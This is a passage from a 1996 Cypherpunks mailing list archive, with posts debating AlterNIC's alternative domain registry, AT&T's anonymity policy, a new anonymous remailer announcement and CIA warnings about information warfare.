>etc. (3) 'emerging democracies' might embrace crypto tech as a
>safeguard against Orwellian practices, to use digital authentication
>to protect from fraud, etc. (4) cheaper costs for rent, wages, etc.
>[though in many cases exploitavily cheap] may outweigh building an
>infrastructure from scratch, (5) building an infrastructure from
>scratch has advantages of building in flexibility towards uses that
>were not built into older structures in N.Am, Eur., etc. (6) desire
>for investment (7) desire for skills or tech to drive education etc.
>in region

Sadly, most developing countries (Third World, LDCs, whatever) have
repressive governments of various stripes...few are libertarian. Several
have embraced computer technology, but primarily as an instrument of social
control.

Singapore is an example of a country that jumped from former colonial
status, surrounded by relatively poor (GNP) countries, to the "Information
Age." And what is the result? What our own Sandy Sandfort dubbed
"Disneyland with a Death Penalty." No spitting, no cursing, no long hair,
no "Wall Street Journal," no pornography, no Internet free access, no
dissension. And smartcards track the movements of all Citizen-Units. Not an
encouraging example.

As for the comment that "they aren't bogged down in older ways of doing
business, communicating, etc." Well, some of these "older ways" include:

- concepts about the ownership of property and transfers of title

- contracts, and the ability to make and enforce them

- understanding of the Uniform Commercial Code (the descendent of the "Law
Merchant" which Western societies have embraced for centuries)

- a stable middle class, solid educational facilities, and a tradition of
business and technical achievement

(These are all things which are missing in many Third World countries, for
whatever reasons. Even in many Second World countries, such as the former
U.S.S.R., and these lacks are making the development of modern economic
systems problematic.)

Certainly some small nations--perhaps island nations--can essentially jump
directly to an "information based economy." The Cayman Islands and several
other examples come to mind.

I find it harder to believe that a _large_ nation is likely to make such a
transition.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 27 Jun 1996 09:42:12 +0800
To: perry@piermont.com
Subject: Re: Alternic.net (was domain zapping)
Message-ID: <2.2.32.19960626174302.0099dcf8@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:54 AM 6/26/96 -0400, you wrote:
>
>William Knowles writes:
>> With all the talk about InterNIC zapping domains, there should be
>> some talk about other registries, Alternic.net : http://www.alternic.net
>> is offering an alpha test for registering new TLD's and the prices
>> are considerably less expensive than the Internic.
>
<snip crap>
>
>They can offer to sell you anything they like, of course, and you can
>pay them, but you don't get anything at all for the money. Domains
>registered with them don't appear in the real DNS.
>
>.pm

Perry,

What constitutes "real DNS"?

DNS server administrators need only add one line to their named.boot file to
resolve .nic hosts.

secondary       nic     204.94.42.1             db.nic


It's that easy! The concept of centralized name resolutions is flawed and
only exists out of habit. 

J.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobpal@cdt.org (Bob Palacios)
Date: Thu, 27 Jun 1996 04:34:09 +0800
To: cypherpunks@toad.com
Subject: Senate Crypto Hearing being "Cybercast" now!
Message-ID: <v02140b03adf6f9221008@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


SENATE ENCRYPTION HEARING BEING "CYBERCAST" LIVE ON THE NET NOW!
Wednesday June 26, 10:30am EDT | 7:30am PDT | 14:30 GMT
HotWired WiredSide Chat
http://www.hotwired.com/wiredside/

Senator Conrad Burns (R-MT) is chairing a hearing regarding cryptography policy
before the Senate Subcommittee on Science, Space and Technology.  The hearing
is being "cybercast" now on HotWired's WiredSide Chat.

Netizens concerned about privacy and security on the Internet are participating
in the hearing; they are submitting comments and questions, and discussing the
hearing with others online.

Witnesses that are testifying now include:

* Phil Zimmermann, Inventor of PGP
* Whit Diffie, Father of Public-Key Cryptography
* Jerry Berman, Executive Director, Center for Democracy and Technology
* Matt Blaze, Cryptographer
* Phil Karn, Cryptographer
* Barbara Simons, Chair of US Public Policy Committee, ACM
* Marc Rotenberg, Director, Electronic Privacy Information Center

HOW TO JOIN THE HEARING LIVE ONLINE

Point your web browser at:

     http://www.hotwired.com/wiredside/

To listen to the hearing, you will need to have RealAudio properly installed on
your computer in order to participate in this event. (You can download RealAudio
software *FREE* by visiting [http://www.realaudio.com/].)

In order to participate in the accompaning chat session (and to ask questions of
the witnesses) you will need to be a member of HotWired.  Membership is *FREE*!
Visit http://www.hotwired.com/ for details.

If you do not have RealAudio capability, you can still participate in the online
discussion.  Telnet to talk.com and log in with your HotWired member name and
password.

The hearing is being brought to you by HotWired, DIGEX, the Voters
Telecommunications Watch, and the Center for Democracy and Technology.



-----
Bob Palacios, Online Organizer/Sysop     Center for Democracy and Technology
<bobpal@cdt.org>                             1634 Eye Street, NW  Suite 1100
                                                        Washington, DC 20006
http://www.cdt.org/                                      (v) +1 202 637 9800
http://www.cdt.org/homes/bobpal/                         (f) +1 202 637 0968

           The CDA fight continues! Visit http://www.cdt.org/ciec/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 27 Jun 1996 08:22:57 +0800
To: Intense <exalt@miworld.net>
Subject: Re: AT&T bans anonymous messages
In-Reply-To: <Pine.LNX.3.91.960625230149.659A-100000@invictor.miworld.net>
Message-ID: <Pine.GUL.3.93.960626105454.14494A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jun 1996, Intense wrote:

> On Tue, 25 Jun 1996, Rich Graves wrote:
> 
> > given username. If you send a message traceable to AT&T, they are held
> > accountable. I think it's reasonable for them to demand that you make
> > messages traceable to yourself so that you are held accountable. 
> 
> Under the common carrier law, i do not think that would apply

This is true, but I wrote "accountable" rather than "liable" on purpose. 
Sites known as spam havens are regularly mailbombed, killfiled, aliased out,
and so on. With the possble exception of mailbombing, all of these means of
holding ISPs accountable for their users' abuse of network are completely
legal and require no legal action on the part of the responding site.

I see no excuse for the craven "indecency" and "personal information" bits
of the AUP, but my reading of the "anonymity" bits is simply that if you
configure Netscape "wrong" and send a spam or a harassing note, you'll get
kicked off. You can still use encryption, and you can still send messages to
anonymous remailers.

Actually, you'd be a fool to rely on AT&T for your privacy services, since
they can determine your identity based on Message-ID. Even Sameer will track
you down and kick you off if you spam from c2. The difference is that Sameer
encourages you to use his services responsibly in ways that ensure that even
he doesn't know who you are. 

Of course AT&T's language SUCKS. I'd like to see an explicit recognition of
the right to anonymity, when done PROPERLY, i.e., with anonymous remailers
or more freedom-loving ISPs intended for that purpose. An opportunity?
Probably not, but it's something for stockholders to consider. 

Skim news.admin.net-abuse.misc for messages from the respected spam-stompers
who are extremely sensitive to free speech issues -- Tim Skirvin, Seth
Breidbart, Chris Lewis, Russ Allbery, JEM. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 27 Jun 1996 01:08:56 +0800
To: cypherpunks@toad.com
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606251954.MAA13366@toad.com>
Message-ID: <19960626111642.6239.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Roy M. Silvernail writes:

 > Actually,  I just went through this.  I wanted scytale.net, but my ISP
 > rep was very upfront about my chances.  The .net is now reserved by
 > InterNIC for ISP's.  The .org domain is held for provable nonprofit
 > corps.  The .us domain was a possibility, but pragmatically impossible
 > due to the >4 month update latency in Minnesota.  Literally, the only
 > choice I had for a domain name was in the .com area.

In my experience, this is 100% bullshit.


-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface

iQCVAwUBMdEcAabBSWSDlCdBAQFnlwQAis6ktpRIJWktljS3QZlsP3pojr6yHNCg
muwJWMczj0IR7qA97DPO6dqoO302rVJCKg6D+4yXU6rkUi3YIKYLVK/evGO4d+YH
HJd6UclikrExAIKns37xqtJhyMcMFhbOhWwsdRm1lH9iujXElWCYANXgGZiKM27S
oKU0tseg4VI=
=D6qk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Thu, 27 Jun 1996 07:17:57 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
In-Reply-To: <199606260559.WAA27746@toad.com>
Message-ID: <m0uYy5s-000f6YC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In mailinglist.cypherpunks Bill Stewart writes:
>I'd guess that the first complaint will either be ignored (because they're
>busy trying to get the service on line and scaled up to 500,000 people)
>or else get the account squashed without a second thought (because they're
>busy trying to get the service on line and scaled up to 500,000 people),
>but the first few spams that cause mass quantities of complaints will start
>to get people thinking.  

Um, you don't read news.admin.net-abuse.misc, do you?  The first few spams
from worldnet have already happened, and from the reports I've seen on there,
the response from worldnet's posthamster has been pretty much nonexistent.
It apparently doesn't help that the 'postmaster' mailbox has a quota just
like the other mailboxen on the system, so every time someone does spam
from worldnet, half the complaint mail to postmaster bounces.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer <lucifer@dhp.com>
Date: Thu, 27 Jun 1996 06:20:38 +0800
To: cypherpunks@toad.com
Subject: Lucifer remailer
Message-ID: <Pine.LNX.3.91.960626120657.32722A-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have just finished setting up a Mixmaster and cpunk remailer at
lucifer@dhp.com.  The PGP key and Mixmaster key are below.

lucifer lucifer@dhp.com 6e57353149a1175f11aba72cedee02fd 2.0.3

- -----Begin Mix Key-----
6e57353149a1175f11aba72cedee02fd
258
AATvJVbP8R9tUF6R9zjSbRdDaz2j1INJvkVI6L6I
5F65Q7lRCoOl8+TCi+HgUo1AErYsLPpHpI1l4F9I
RUqvH/fvR7GuqgIJc+RsGyQPPG0dpL5lHt2ppdmW
wcTX85ZKRK242SW1hTih43IaCmXr+i1zX6+QZsr1
MtAqwDlyDgoU0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzHPdZkAAAEEAK3rI5oq3dwDV5inleitjy03JvhBD/GtbRRDO1noLUnRf4FV
CmCfGJrqitHtIBqhA+hIRBcNRo7J48Yiu6ctda29xe/rEy3QdSKHpZhstsV+hzw3
42Lhogm1cW2QPrvjJQUgU5mpKR9qKn7KQLBcVz/Mx1EvX4aMGJ2oJ1gRbIg5AAUR
tCRBbm9ueW1vdXMgcmVtYWlsZXIgPGx1Y2lmZXJAZGhwLmNvbT6JAJUDBRAxz3vx
nagnWBFsiDkBAfUAA/9ufh0GPUo6uR4/5/tbbFKyQs8fW0NmDkrU+xni7QNmKKUj
qC7lJ/MHPxRGzuXaYE+k9I8NmI1DxyzdWlRX/X6uwcwYPOxa/+CI9HUAkcB/Q/N8
GZJckumcU7hlMim08lFJQjsEWxNyqKefAeOAKQ5v5xt3rmpPDmHrXbOuJ104Ng==
=dFZY
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdFhcZ2oJ1gRbIg5AQGqSwP9HzVjkvkN4oBIHh5AzvsKZoZG+zMvId7Z
+LlvpSOSyXm+Vaxga28jBL03JIN8j6+yJtZy1h07VlYYwnhhBrhnIufeq+mO+ea6
k/ymFcUFsfM4jnf5jvaHKJTMULnmL3wspWzBKl3CRkQ2e238ozx8IWdhTxxdD9vj
aO3vQZHHFTI=
=/ICd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <brucem@wichita.fn.net>
Date: Thu, 27 Jun 1996 07:45:17 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: CIA Fears UmpTeen InfoNukes
In-Reply-To: <31D13BF9.467A@vail.tivoli.com>
Message-ID: <Pine.BSI.3.91.960626121433.4983A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jun 1996, Mike McNally wrote:

> By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
> on DoD computers; apparently British police arrested a "hacker" the
> other day.  Anyway, the article included a claim that there have been
> 250,000 attempted break-ins on DoD computers over the past year.
> 
> Does anybody know how they count that?

    Any time that someone doesn't successfully log into their computer, 
pings their site, fingers their site, does a nslookup on their site or 
anything else that constitutes an "attack."

                    Bruce M. * brucem@feist.com
        ~---------------------------------------------------~
        "Knowledge enormous makes a god of me." -- John Keats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Trei <trei@zipnet.net>
Date: Thu, 27 Jun 1996 07:03:59 +0800
To: cypherpunks@toad.com
Subject: Life imitates art (InfoWar, Sunday Times article)
Message-ID: <199606261626.MAA19023@zip0.zipnet.net>
MIME-Version: 1.0
Content-Type: text/plain




Winn Schwartau is much too modest.

Following up on the alleged info-ransom attacks on European financial
institutions, I've tracked down his entertaining fascinating resume
at:

http://www.homecom.com/people/schwartau-frame.html

This led me to the most amazing discovery: Winn predicted the
technologies used in the alleged attacks at least three years ago, in
the self-published science fiction novel "Terminal Compromise." The text
of this prescient work can be found on the web at:

http://www.inform.umd.edu:8080/Educational_Resources/ReadingRoom/Fiction/TerminalCompromise

I won't quote from it (there are dire warnings against doing so in the
intro), but here are some of the elements in which alleged real life is
so closely imitating Winn's art:

EMP bomb attacks against financial institutions	chapter 11     
"HERF" guns (described but un-named)		chapter 16
info-ransom demands against large corporations	chapter 17
... and many others.

If I had predicted the future so well and so far ahead, I'd be shouting
it from the rooftops, and use the strength of the reputation I'd
instantly establish to set up shop as a professional prognosticator (for
fat fees).

I wonder why Winn hasn't bothered to bring this to our attention - and
I hope that Peter Warren and the editors of the London Sunday Times
have heard about his astounding foresight.

Winn, my hat's off to you, and my $7 "shareware fee" will be in mail
as soon as I finish the book!

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 27 Jun 1996 09:46:18 +0800
To: Rich Graves <exalt@miworld.net>
Subject: Re: AT&T bans anonymous messages
Message-ID: <2.2.32.19960626194119.007538f8@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 11:16 AM 6/26/96 -0700, Rich Graves wrote:

>I see no excuse for the craven "indecency" and "personal 
>information" bits of the AUP, but...

Plausible deniability.  Currently, the majors don't want to
be publicly associated with "naughty" uses of their networks.
The do, however, want the lucrative fees generated by them.
As a result, an enormous market niche has come open for
"resellers" of 900/976 services.  The majors can say, "We
don't offer our services to THOSE types of services, but we
are powerless to stop our resellers from doing that sort of
business."  The same rational applies to the Internet.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herr Wendigo <wendigo@gti.net>
Date: Thu, 27 Jun 1996 06:44:12 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606260644.CAA00869@apollo.gti.net>
Message-ID: <199606261646.MAA25289@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Bill Stewart wrote:
: 
: Perhaps I'm misunderstanding your point.  Because the root nameservers
: provide name service for the top level domains, if you want to find 
: schmoe.org, you need to ask a nameserver for .org where it is, and to find
: www.schmoe.org, you need to ask a nameserver for .org where to find a 
: primary or secondary nameserver for schmoe.org - so if the .org folks
: decide to drop you, you become hard to reach, even if you've got
: the primary and secondary name servers working just fine.

The org. folks ARE the InterNIC.  The machines on ROOT-SERVERS.NET are all
fed by the NIC.  My problem with the original statement was the implication
that using your own nameserver as having zone authority was a bad idea.
Not only is it a good idea, it is standard operating procedure.  You're 
absolutely right about being "hard to reach" (a bit understated) if the
NIC drops your record.  Any recursive lookups will fail.


: Now, you can improve your odds a bit by getting popular systems, such as
: aol.com and compuserve.com to act as secondary nameservers for you -
: you may lose connectivity to Europe, but you're in the cache for half
: the Net that way...

Well, if you decide to use AOL as your secondary, you will only be accessible
(by name) outside of aol.com for about 48 hours after the NIC drops your 
records.  After that, only users who use one of aol.com's name servers
will be able to access your domain.  Then, when someone else registers your
domain, AOL will probably drop you like a bad habit (if they don't when the NIC
drops you).  I'm sure that AOL (or Compuserve, etc.) are not too keen on being
the odd man out when the NIC and the rest of the world say XYZ.COM is owned
by your competitor and AOL says it is owned by you.

mark

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdFpaQ0HmAyu61cJAQEn+AP/Ttiw04EyeEQ4/6K19ZqXAbOui+zZ+fmu
t/RJJGL834E/8yWB3xmbAmltDR+/V5T679iBUtw8Q+0CQEZOWwXeguRriILyabMn
XRFdCP8+Cw5zvrz12BtIKYHCm4o9MG7or3BBbP3iHSF1ia6n2eMPwjRiaKrlqBYm
Gqv9lThaoqU=
=LD//
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herr Wendigo <wendigo@gti.net>
Date: Thu, 27 Jun 1996 08:21:24 +0800
To: erehwon@c2.org (William Knowles)
Subject: Re: Alternic.net (was domain zapping)
In-Reply-To: <Pine.SUN.3.91.960625220103.16972A@infinity.c2.org>
Message-ID: <199606261739.NAA28980@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be William Knowles wrote:
: 
: With all the talk about InterNIC zapping domains, there should be
: some talk about other registries, Alternic.net : http://www.alternic.net
: is offering an alpha test for registering new TLD's and the prices
: are considerably less expensive than the Internic.
: 

ALTERNIC.NIC is a couple of kids with a few Linux boxes.  It's rather amusing,
but they did go through a lot of trouble to make it look good.  Sure,
the new TLD's work if you use their name server.

I thought about actually registering NSA.TEL and MCI.ATT with them for
shits and giggles.  I love the TLD's they have ... BSA, XXX, CAT, DOG ...
it was a good laugh, but it's way past April 1st.

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdF1zA0HmAyu61cJAQGUGwP+KXJnvznmCPqWRdVHdpthvkNNqcVsBM+D
vajJQc6RLmhEbKsBrTlcNfF4zN5bREGCRP4NAxp7pbw4ewlcfEQo5A2a2CsllmbJ
xD3RgK/EY03nErT0fsLuKVU9dcAhUJILj2KWadMkL9vzAg05Me/7YaGqXSkKHJIM
1JEKS1xFoto=
=yAkh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 27 Jun 1996 09:54:11 +0800
To: cypherpunks@toad.com
Subject: Re: Alternic.net (was domain zapping)
Message-ID: <v02140b02adf75a42eda3@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


John Fricker writes:
> At 05:54 AM 6/26/96 -0400, Perry wrote:
[...regarding alternte registries...]
> >
> >They can offer to sell you anything they like, of course, and you can
> >pay them, but you don't get anything at all for the money. Domains
> >registered with them don't appear in the real DNS.
>
> What constitutes "real DNS"?

For 99.99999% of the Internet "real DNS" is defined by the root server list
distributed with the most recent version of BIND.

> DNS server administrators need only add one line to their named.boot file to
> resolve .nic hosts.
>
> secondary       nic     204.94.42.1             db.nic
>
> It's that easy!

Sorry, but this only gives you domain name resolution for the .nic TLD, not
the other new top-level domains they want to create or any domains that
alternic is proposing to provide service for.  To do that one needs to add an
appropriate line into the root.cache file (or whatever the root server list
is in your name server setup), at which point you are also trusting alternic
with pointing you properly to any domain they get queried on.

> The concept of centralized name resolutions is flawed and
> only exists out of habit.

It is not just about habit, it is also about trust.  There are alternatives,
but they need to be thought-out much more than this alternic stuff...

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 27 Jun 1996 10:47:16 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
Message-ID: <2.2.32.19960626213301.006951b4@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:32 AM 6/26/96 Mike McNally wrote:

>By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
>on DoD computers; apparently British police arrested a "hacker" the
>other day.  Anyway, the article included a claim that there have been
>250,000 attempted break-ins on DoD computers over the past year.
>Does anybody know how they count that?

Nope, especially since they claimed a large percentage of those attacks
went "unnoticed".  I fail to see how they can know they happened if they
went unnoticed.  They also neglected to mention exactly what consitutes 
an "attack" or breakin attempt.  Some people far more cynical than the
average sheep would claim that report was used as a tool to justify new
massive expenditures to congress and the public.  //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 27 Jun 1996 10:38:32 +0800
To: cypherpunks@toad.com
Subject: Re: Life imitates art (InfoWar, Sunday Times article)
Message-ID: <adf6f94c010210046b30@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:26 PM 6/26/96, Peter Trei wrote:
>Winn Schwartau is much too modest.

I don't think so. Read on.


>This led me to the most amazing discovery: Winn predicted the
>technologies used in the alleged attacks at least three years ago, in
>the self-published science fiction novel "Terminal Compromise." The text
>of this prescient work can be found on the web at:
...
>If I had predicted the future so well and so far ahead, I'd be shouting
>it from the rooftops, and use the strength of the reputation I'd
>instantly establish to set up shop as a professional prognosticator (for
>fat fees).
>
>I wonder why Winn hasn't bothered to bring this to our attention - and
>I hope that Peter Warren and the editors of the London Sunday Times
>have heard about his astounding foresight.

He _has_ been bringing it to our attention! In fact, he has been shouting
it from the rooftops. He has sponsored at least two "InfoWar" and/or
"InfoWarCon" conferences, including one in Europe and one in the D.C. area.
Robert Steele was a co-sponsor. (There have been many announcements here
and elsewhere on the Net about these conferences; I recall at least one
subscriber of our list went to one of them.)

He also wrote another book, "Information Warfare," and was essentially one
of the main folks interviewed in a BBC special called "The I-Bomb"
(Information Bomb), shown recently on A&E in the U.S. (I had about a minute
or so on this show, much to my regret.)

I have my doubts about "HERF" attacks being current realities, for various
reasons (some of which I wrote about in a recent post here), and I have a
few other doubts, but I certainly don't think Schwartau is being coy about
his involvement in this whole thing.

Whether it is hype to sell conference attendance seats, or to sell
consulting work, or is real, or is partly real, or is imagined....well, I
don't know.

I suspect the recent riding of this bandwagon by Deutch and Perry is easily
understandable: anything that triggers fear and uncertainty is good for
those seeking more control of cyberspace.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 27 Jun 1996 10:47:39 +0800
To: cypherpunks@toad.com
Subject: Re: Alternic.net (was domain zapping)
Message-ID: <2.2.32.19960626214217.00674520@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:39 PM 6/26/96 -0400, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>An entity claiming to be William Knowles wrote:
>: 
>: With all the talk about InterNIC zapping domains, there should be
>: some talk about other registries, Alternic.net : http://www.alternic.net
>: is offering an alpha test for registering new TLD's and the prices
>: are considerably less expensive than the Internic.
>: 
>
>ALTERNIC.NIC is a couple of kids with a few Linux boxes.  It's rather amusing,
>but they did go through a lot of trouble to make it look good.  Sure,
>the new TLD's work if you use their name server.
>
>I thought about actually registering NSA.TEL and MCI.ATT with them for
>shits and giggles.  I love the TLD's they have ... BSA, XXX, CAT, DOG ...
>it was a good laugh, but it's way past April 1st.
>

Well, Karl's IETF draft is certainly serious. A Karl is a bit more than a
kid with a linux box having started one of the largest ISPs in Chicago and
being a component in the anti CIX fiasco.

I still fail to see why decentralizing control of namespace is a bad idea.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 27 Jun 1996 05:08:01 +0800
To: cypherpunks@toad.com
Subject: TWP on CIA Info Gears
Message-ID: <199606261456.OAA29250@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The latter part of this article elaborates the NYT report 
   today. 
 
 
   The Washington Post, June 26, 1996, p. A19. 
 
 
   CIA Gears Up to Thwart 'Information Attacks' 
 
      Deutch Lists Computer Break-Ins, Terrorism as 
      High-Priority Potential Threats to National Security 
 
   By R. Jeffrey Smith 
 
 
   CIA director John M. Deutch warned yesterday that the 
   country is likely to experience some a very large and 
   uncomfortable" disruptions of vital computer systems at the 
   hands of foreign terrorists or hostile nations in coming 
   years, but pledged a major new U.S. effort to detect and 
   combat the threat of computer break-ins. 
 
   "We have evidence that a number of countries around the 
   world are developing the doctrine, strategies, and tools to 
   conduct information attacks" on military-related computers, 
   Deutch told a hearing of the Senate Permanent Subcommittee 
   on Investigations, while declining to name these nations. 
 
   Deutch added that he is convinced that foreigners are 
   becoming increasingly aware "that advanced societies, 
   especially the United States, are increasingly dependent on 
   open and potentially vulnerable" computers to control 
   electric power, airplane traffic, telecommunications and 
   financial operations -- posing an attractive target for 
   virtually "any nation or foreign terrorist organization." 
   Emphasizing that the Clinton administration has just begun 
   to grasp the dangers involved and begin working on the 
   problem, Deutch said "we are not well-organized as a 
   government to address these issues" and cautioned that 
   making vital computers much less vulnerable to attack may 
   take decades. 
 
   "The electron is the ultimate precision-guided weapon," 
   Deutch said, but "it is not [a problem about] which it's 
   absolutely apparent ... the best way to proceed." 
 
   Deutch said he nonetheless had already drawn up plans to 
   create an office at the National Security Agency to be 
   called the Information Warfare Technology Center, which 
   will focus on analyzing the risks that foreign hackers pose 
   to U.S. computers and help create new methods of 
   investigating and defending the U.S. against electronic 
   break-ins. 
 
   Deutch also said that he supports creating a "real-time 
   response center" for any major domestic or foreign attacks 
   against civilian computers under the supervision of the 
   Justice Department, as well as a separate, Defense 
   Department center for responding to attacks on 
   military-related computers. 
 
   Deutch disclosed that the intelligence community conducted 
   an extensive survey last year of the risks of an attack on 
   computers controlling U.S. telephones, the electric power 
   grid, oil refineries and other utilities. He said the 
   results are classified, but added that a new, broader 
   estimate of the threat is to be completed by December. 
 
   He also said the intelligence community has begun to hunt 
   more diligently for evidence of any foreign intent to 
   attack U.S. computers, any sign of foreign sponsorship for 
   U.S.-based computer hacking activities, and for any 
   indication that foreign organized crime figures are 
   becoming involved in attacks on computers at U.S. financial 
   institutions. 
 
   The Defense Intelligence Agency, moreover, is trying to 
   develop a way to predict a major "information warfare 
   attack" against the United States, Deutch said. 
 
   One obstacle is that banks and other private institutions 
   have been reluctant to divulge any evidence of computer 
   intrusions for fear that it will leak and erode the 
   confidence of their customers. Deutch said "the situation 
   is improving" but that more cooperation was needed from 
   major corporations, and said the CIA remains willing to 
   share information with such firms about the risks they 
   might face. 
 
   Although he declined to cite any specific examples of 
   computer warfare, Deutch said he would list it as the 
   second most worrisome threat to U.S. national security -- 
   just below the threat posed by foreign chemical, nuclear, 
   and biological arms. 
 
   In answer to a question from Senator Sam Nunn (D Ga.) about 
   whether the government was aware of the danger, Deutch 
   said, "I don't know whether we will face an electronic 
   Pearl Harbor, but we will have, I'm sure, some very 
   unpleasant circumstances in this area or our allies 
   will.... I'm certainly prepared to predict some very, very 
   large and uncomfortable incidents in this area." 
 
   [End]  
 
 
   Final notice:  Wash Post on the Web at: 
 
        http://www.washingtonpost.com 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 27 Jun 1996 09:08:15 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: Alternic.net (was domain zapping)
In-Reply-To: <2.2.32.19960626174302.0099dcf8@vertexgroup.com>
Message-ID: <199606261910.PAA03334@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



John F. Fricker writes:
> What constitutes "real DNS"?

The DNS that everyone on earth but the few hundred loonies use.

The fact that if you put a URL on the side of a bus using one of
"alternic"'s alleged domain names in it, no one on earth will be able
to read the page. I think that more or less says everything.

> It's that easy! The concept of centralized name resolutions is flawed and
